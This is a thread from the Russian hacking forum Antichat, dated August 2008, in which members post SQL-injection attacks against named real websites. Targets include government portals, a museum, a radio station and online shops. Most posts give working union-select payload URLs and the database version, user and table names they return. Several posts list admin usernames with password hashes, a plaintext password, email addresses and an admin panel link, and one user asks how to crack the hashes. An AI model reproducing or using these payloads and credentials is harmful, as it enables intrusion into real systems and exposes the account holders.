ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6231  
Старый 09.08.2008, 01:12
Zircool
Участник форума
Регистрация: 01.03.2006
Сообщений: 169
Провел на форуме:
519496

Репутация: 78
Отправить сообщение для Zircool с помощью ICQ
По умолчанию

Сайт: www.museum.ge PR=5

Цитата:
http://www.museum.ge/web_page/index.php?id=-40+union+select+1,2,3,4,5,6,7,8,9/*
 
Ответить с цитированием

  #6232  
Старый 09.08.2008, 01:21
WAR!9G
Участник форума
Регистрация: 24.06.2007
Сообщений: 299
Провел на форуме:
467372

Репутация: 212
По умолчанию

http://www.bar.lv/index.php?lang_id=5&categ_id=-1+union+select+1,2,3,4,5,6,7/*&op=search&search_type=4&sop=category

VERSION:4.1.15-Debian_1ubuntu5-log
USER:bar@92.240.65.136
DATABASE:c_bar

http://www.bar.lv/index.php?lang_id=5&categ_id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(user
(),0x71),0x71),5,6,7/*&op=search&search_type=4&sop=category
http://www.bar.lv/index.php?lang_id=5&categ_id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(versi
on(),0x71),0x71),5,6,7/*&op=search&search_type=4&sop=category
http://www.bar.lv/index.php?lang_id=5&categ_id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(data
base(),0x71),0x71),5,6,7/*&op=search&search_type=4&sop=category

USERNAME: Sergey

http://www.bar.lv/index.php?lang_id=5&categ_id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(usern ame,0x71),0x71),5,6,7/**/from/**/users/*&op=search&search_type=4&sop=category
 
Ответить с цитированием

  #6233  
Старый 09.08.2008, 02:58
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

inuitcircumpolar.com
тИц = 30 PR = 5

Цитата:
http://www.inuitcircumpolar.com/index.php?ID=1+union+select+1,1,3,4,5,6,7,8,9,0,1, concat_ws(0x3a,version(),user(),database()),3,4,5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6--&Lang=En
version:5.0.51-log
user :indelta_cms@75.126.146.102
database:indelta_icc
Цитата:
SQL-injection
http://www.inuitcircumpolar.com/index.php?ID=1+union+select+1,1,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6--&Lang=En
Таблицы:
Цитата:
http://www.inuitcircumpolar.com/index.php?ID=1+union+select+1,1,3,4,5,6,7,8,9,0,1, table_name,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 ,3,4,5,6+from+information_schema.tables--&Lang=En
------------------------------------------------------------------
pixheaven.net
тИц = 20 PR = 5
Цитата:
http://www.pixheaven.net/galerie_us.php?id=-3+union+select+1,2,3,4,5,6,7,8,9/*
Вот скуля,принтабельное поле - 7
Цитата:
http://www.pixheaven.net/galerie_us.php?id=-3+union+select+1,2,3,4,5,6,version(),8,9/*

J\Очень интересно выводиться версия,но выводиться ограниченно =( то есть можно вывести только числовые значения

Последний раз редактировалось DDoSька; 09.08.2008 в 03:21..
 
Ответить с цитированием

  #6234  
Старый 09.08.2008, 03:10
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

GOVядинка
http://www.dswd.gov.ph/
тИц = 0 PR = 6

Цитата:
SQL-injection
http://www.dswd.gov.ph/faqdetails.php?id=-47+union+select+1,2,3,4,5,6/*
Цитата:
http://www.dswd.gov.ph/faqdetails.php?id=-47+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6/*
Version:5.0.22
User:web41_u1@localhost
database:web41_db1
Таблицы:
Цитата:
http://www.dswd.gov.ph/faqdetails.php?id=-47+union+select+1,table_name,3,4,5,6+from+informat ion_schema.tables/*
P_admin
--ID
--username
-- password
tbGuestbook
tbInqUser
--inUserId
--vcUsername
--vcPassword
--vcFullname
--vcRegion
--vcDivision
--vcAccess
--vcEmail
tbUser
--inUserId
--vcUsername
--vcPassword
--vcFullname
--vcRegion
--vcDivision
--vcAccess
Всего:40 таблиц
Цитата:
tbUser:

admin:d1a032287eaf12e81dd4728323514331
benz:38739d2aac3487e29f6315b64fcd56d5
ampdaep:ab1768ab5bf8233b648a6bb58977e655
bacsec:3015ca4f270b6938b27c95863174a8db
Цитата:
P_admin:
1:alec:f461c42a224b2af04cb40f662ab1c12a
2:benz:5cb2e61606e1d5e1c65c6c31438138a8
3:abet:yofveweq
отчет об ошибках выключен =\
Все делал ручками
********************************************

terrorfreetomorrow.org
тИц = 20 PR = 0

прикольно,все ошибки в алерте выводятсья)))


Цитата:
SQL-injection
http://www.terrorfreetomorrow.org/articlenav.php?id=-5+union+select+1,2,3,4,5,6/*
Цитата:
http://www.terrorfreetomorrow.org/articlenav.php?id=-5+union+select+1,2,3,4,concat_ws(0x3a,version(),us er()),6/*
Version: 5.0.45-log
user:terrorf_user@65.99.201.17
Таблицы:
Цитата:
http://www.terrorfreetomorrow.org/articlenav.php?id=-5+union+select+1,2,3,4,table_name,6+from+informati on_schema.tables/*
passwords
--username
--upassword
--emailaddress
--firstname
-- lastname
--securitylevel
[QUOTE]http://www.terrorfreetomorrow.org/articlenav.php?id=-5+union+select+1,2,3,4,concat_ws(0x3a,username,upa ssword,emailaddress,securitylevel),6+from+password s+limit+0,11/*
kballen:7c72a099259a2c1c::1
ahutomo:22261f196a56676d:ahutomo@terrorfreetomorro w.org:1

*****************************************
http://www.jerusalemsummit.org/eng/news.php?news=10+union+select+1,2,3,4,5,6,7,8,9,0/*
version: 4

Последний раз редактировалось DDoSька; 09.08.2008 в 05:37..
 
Ответить с цитированием

  #6235  
Старый 09.08.2008, 09:44
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Mai.ru - PR 7
Цитата:
http://www.mai.ru/colleges/fac_9/k902/symp/razdel.php?id_razd=7'+and+1=0+union+select+1,2,con cat_ws(0x203a20,id,login,version()),4,5,6,7+from+u sers+limit+0,1/*
Nsa.gov.cn - PR 7
Цитата:
http://www.nsa.gov.cn/view.php?id=-895+union+select+1,version(),3,table_name,5,6,7,8, 9,10,11,12,13,14,15,16+from+information_schema.tab les+limit+16,1
таблы..
Цитата:
http://www.nsa.gov.cn/view.php?id=-895+union+select+1,version(),3,concat_ws(0x3a,user ,password),5,6,7,8,9,10,11,12,13,14,15,16+from+cpc .admin_deliver
Цитата:
http://www.nsa.gov.cn/view.php?id=-895+union+select+1,version(),3,concat_ws(0x3a,user ,password),5,6,7,8,9,10,11,12,13,14,15,16+from+mys ql.user
Radiobremen.de - PR 7
Цитата:
http://www.radiobremen.de/nordwestradio/kurzundgut/index.php?id=1+union+select+1,unhex(hex(version()) ),3,4,5,6,7,8/*
Studiocromie.org - PR 4
Цитата:
http://www.studiocromie.org/gallery.php?id_art=56&id=-216+union+select+1,2,3,4,5,6,7,8,9,10,11,12,table_ name,14,15,16,17,18,19+from+information_schema.tab les+limit+28,1--
5 ver. tables..
Цитата:
http://www.studiocromie.org/gallery.php?id_art=56&id=-216+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat _ws(0x3a,user,pwd),14,15,16,17,18,19+from+studiocr _db.user--
Prefecturatimis.ro - PR 4
Цитата:
http://www.prefecturatimis.ro/comunicate_articol.php?id=99999999+union+select+1, 2,3,4,version(),6/*
Id-studio.info - PR 3
Цитата:
http://id-studio.info/index.php?option=com_neoreferences&Itemid=27&catid =-1+union/**/select+version()/*
 
Ответить с цитированием

  #6236  
Старый 09.08.2008, 09:48
WAR!9G
Участник форума
Регистрация: 24.06.2007
Сообщений: 299
Провел на форуме:
467372

Репутация: 212
По умолчанию

http://www.ezerzeme.lv/index.php?ln=ru&action=show&type=daily&eventid=1'+ union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13/*

VERSION: 5.0.32-Debian_7etch5-log
USER: web41_u1@localhost
DATABASE: web41_db1

http://www.ezerzeme.lv/index.php?ln=ru&action=show&type=daily&eventid=1'+ union+select+1,passwd,3,4,5,6,7,8,9,10, 11,12,13/**/from/**/users/*

http://www.ezerzeme.lv/index.php?ln=ru&action=show&type=daily&eventid=1'+ union+select+1,name,3,4,5,6,7,8,9,10,11 ,12,13/**/from/**/users/*

http://www.ezerzeme.lv/index.php?ln=ru&action=show&type=daily&eventid=1'+ union+select+1,email,3,4,5,6,7,8,9,10,1 1,12,13/**/from/**/users/*
 
Ответить с цитированием

  #6237  
Старый 09.08.2008, 12:30
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
По умолчанию

stpgov.org
Код:
http://www.stpgov.org/online_planning.php?cat=-6+union+select+1,2,3,concat_ws(0x3,version(),user(),database()),5,6,7,8,9,10,11,12/*
4.1.20stpgov@localhostSTPGOV
Код:
http://www.stpgov.org/online_planning.php?cat=-6+union+select+1,2,3,concat_ws(0x3,email,password),5,6,7,8,9,10,11,12+from+users/*
jhart@stpgov.orgJB1stpgova
Админка: http://www.stpgov.org/admin/
 
Ответить с цитированием

  #6238  
Старый 09.08.2008, 12:45
WAR!9G
Участник форума
Регистрация: 24.06.2007
Сообщений: 299
Провел на форуме:
467372

Репутация: 212
По умолчанию

http://www.trekkingclub.kz/index.php?p=1+union+select+1,2,3,4,5,6,7/*
http://www.trekkingclub.kz/index.php?p=1+union+select+1,database(),3,4,5,6,7/*

VERSION:4.1.22
USER:tclub@localhost
DATABASE:tclub
 
Ответить с цитированием

  #6239  
Старый 09.08.2008, 19:35
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
По умолчанию

gtr-gifts.com
Код:
http://www.gtr-gifts.com/Shop.php?cat=6&subcat=-29+union+select+concat_ws(0x3,version(),user(),database()),2,3,4/*
5.0.45-community-ntimanez_gtr@localhostimanez_gtr
Код:
http://www.gtr-gifts.com/Shop.php?cat=6&subcat=-29+union+select+concat(user_name,0x3,user_password),2,3,4+from+gtr_admin+limit+0,1/*
waynecarling
 
Ответить с цитированием

  #6240  
Старый 09.08.2008, 20:41
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.pride.ua/index.php?showtopic=-1+union+select+1,concat(name,0x3a3a,member_login_k ey),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+limit+0, 10/*

Что-то не брутятся хеши. Mb дабл md5? .....
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
 


Быстрый переход




ANTICHAT.XYZ